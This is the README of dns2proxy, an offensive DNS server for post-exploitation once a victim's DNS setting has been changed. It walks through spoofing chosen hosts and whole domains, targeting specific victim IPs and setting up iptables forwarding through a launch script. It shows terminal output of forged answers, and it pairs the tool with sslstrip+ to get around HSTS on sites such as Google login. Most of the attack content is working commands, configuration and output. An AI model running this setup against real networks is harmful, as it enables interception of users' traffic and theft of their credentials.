Offensive DNS server
This tools offer a different features for post-explotation once you change the DNS server to a Victim. <Referer to help (-h) to new params options>
Traditional DNS Spoof adding to the response the original IP address.
Using spoof.cfg file:
hostname ip.ip.ip.ip
root@kali:~/dns2proxy# echo "www.s21sec.com 1.1.1.1" > spoof.cfg
// launch in another terminal dns2proxy.py
root@kali:~/dns2proxy# nslookup www.s21sec.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53Name: www.s21sec.com
Address: 1.1.1.1
Name: www.s21sec.com
Address: 88.84.64.30
or you can use domains.cfg file to spoof all host of a same domain:
root@kali:~/demoBH/dns2proxy# cat dominios.cfg
.domain.com 192.168.1.1root@kali:~/demoBH/dns2proxy# nslookup aaaa.domain.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53Name: aaaa.domain.com
Address: 192.168.1.1
Hostnames at nospoof.cfg will no be spoofed.
This feature implements the attack of DNS spoofing adding 2 IP address at the top of the resolution and configuring the system to forward the connections.
Check my slides at BlackHat Asia 2014 [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES] (http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and the [Demo Video] (http://www.youtube.com/watch?v=cJtbxX1HS5I).
To launch this attach there is a shellscript that automatically configure the system using IP tables. You must edit this file to adapt it to your system. DON´T FORGET AdminIP variable!!!!
Both IPs must be at the same system to let dns2proxy.py configurate the forwarding
Usage: ia.sh < interface > [ip1] [ip2]
root@kali:~/dns2proxy# ./ia.sh eth0 172.16.48.128 172.16.48.230
Non spoofing imap.gmail.com
Non spoofing mail.s21sec.com
Non spoofing www.google.com
Non spoofing www.apple.com
Non spoofing ccgenerals.ms19.gamespy.com
Non spoofing master.gamespy.com
Non spoofing gpcm.gamespy.com
Non spoofing launch.gamespyarcade.com
Non spoofing peerchat.gamespy.com
Non spoofing gamestats.gamespy.com
Specific host spoofing www.s21sec.com with 1.1.1.1
Specific domain IP .domain.com with 192.168.1.1
binded to UDP port 53.
waiting requests.
Starting sniffing in (eth0 = 172.16.48.128)....< at other terminal >
root@kali:~/dns2proxy# nslookup www.microsoft.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53Name: www.microsoft.com
Address: 172.16.48.128
Name: www.microsoft.com
Address: 172.16.48.230
Name: www.microsoft.com
Address: 65.55.57.27
The fhtang.sh script will terminate the program and restore normal iptables.
Hostnames at nospoof.cfg will no be spoofed.
Automatically the dns server detects and correct the changes thats my sslstrip+ do to the hostnames to avoid HSTS, so will response properly.
This server is necesary to make the sslstrip+ attack.
root@kali:~/dns2proxy# nslookup webaccounts.google.com 127.0.0.1 <-- DNS response like accounts.google.com
Server: 127.0.0.1
Address: 127.0.0.1#53Name: webaccounts.google.com
Address: 172.16.48.128
Name: webaccounts.google.com
Address: 172.16.48.230
Name: webaccounts.google.com
Address: 74.125.200.84root@kali:~/dns2proxy# nslookup wwww.yahoo.com 127.0.0.1 <-- Take care of the 4 w! DNS response like
Server: 127.0.0.1 www.yahoo.com
Address: 127.0.0.1#53Name: wwww.yahoo.com
Address: 172.16.48.128
Name: wwww.yahoo.com
Address: 172.16.48.230
Name: wwww.yahoo.com
Address: 68.142.243.179
Name: wwww.yahoo.com
Address: 68.180.206.184
dnspython (www.dnspython.com) is needed. Tested with Python 2.6 and Python 2.7.
Dns2proxy can be imported and run within a Python script or larger project. To use Dns2proxy as a module, first import it within your project file:
import dns2proxy
Then start it by making a call to dns2proxy.run() as shown below, passing your network interface as an argument:
import dns2proxy
dns2proxy.run(interface='wlan0')
Note that dns2proxy.run() is a blocking call, and that running dns2proxy in parallel with other modules such as sslstrip2 requires the use of daemon processes. For example:
import dns2proxy
from multiprocessing import Process
def run_dns2proxy(interface):
dns2proxy.run(interface=interface)
p = Process(target=dns2proxy.run, args=('wlan0',))
p.start()
print 'Run the rest of your code here'
p.stop()
domains.cfg (or dominios.cfg): resolve all hosts for the listed domains with the listed IP
Ex: .facebook.com 1.2.3.4 .fbi.gov 1.2.3.4
spoof.cfg : Spoof a host with a ip
Ex: www.nsa.gov 127.0.0.1
nospoof.cfg: Send always a legit response when asking for these hosts.
Ex. mail.google.com
nospoofto.cfg: Don't send fake responses to the IPs listed there.
Ex: 127.0.0.1 4.5.6.8
victims.cfg: If not empty, only send fake responses to these IP addresses.
Ex: 23.66.163.36 195.12.226.131
resolv.conf: DNS server to forward the queries.
Ex: nameserver 8.8.8.8